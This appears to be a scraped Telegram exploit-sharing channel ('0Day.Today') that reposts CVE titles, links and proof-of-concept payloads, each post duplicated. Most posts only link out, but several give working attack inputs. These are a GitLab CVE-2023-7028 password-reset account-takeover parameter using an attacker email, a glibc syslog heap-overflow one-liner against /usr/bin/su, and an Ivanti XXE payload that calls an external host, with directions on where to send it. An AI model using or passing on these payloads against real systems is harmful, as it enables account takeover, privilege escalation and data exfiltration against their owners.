CVE-2023-21987 and CVE-2023-21991 - VirtualBox internals and exploitation
Github
#CVE #virtualbox
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #virtualbox
——————
0Day.Today
@LearnExploit
@Tech_Army
Qrious Secure
Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991
Introduction Hi, I am Trung (xikhud). Last month, I joined Qrious Secure team as a new member, and my first target was to find and reproduce the security bugs that @bienpnn used at the Pwn2Own Vancouver 2023 to escape the VirtualBox VM.
Since VirtualBox is…
Since VirtualBox is…
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Poc:
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
Poc:
user[email][]=valid@email.com&user[email][]=attacker@email.com
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com #CVE #POC ———— 0Day.Today @LearnExploit @Tech_Army
GitHub
GitHub - Vozec/CVE-2023-7028: This repository presents a proof-of-concept of CVE-2023-7028
This repository presents a proof-of-concept of CVE-2023-7028 - Vozec/CVE-2023-7028
Moriarty - Moriarty scans for a variety of CVEs and vulnerabilities
Github
#CVE #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - BC-SECURITY/Moriarty: Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential…
Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential exploits for Privilege Escalation in Windows environments. - GitHub - BC-SECURITY/Moriarty: Mor...
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-26360 - Unauthenticated RCE in Adobe Coldfusion
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
#CVE #POC #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
Unauthenticated RCE in Adobe Coldfusion – CVE-2023-26360
Overview CVE-2023-263060 was exploited in the wild in Adobe ColdFusion product, a commercial application server for rapid web application development. The vulnerability affects both the 2018 and...
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog
POC :
(exec -a "
#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
POC :
(exec -a "
printf '%0128000x' 1
" /usr/bin/su < /dev/null)#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-22024 - XXE on Ivanti Connect Secure
payload encoded base64:
⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>
⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army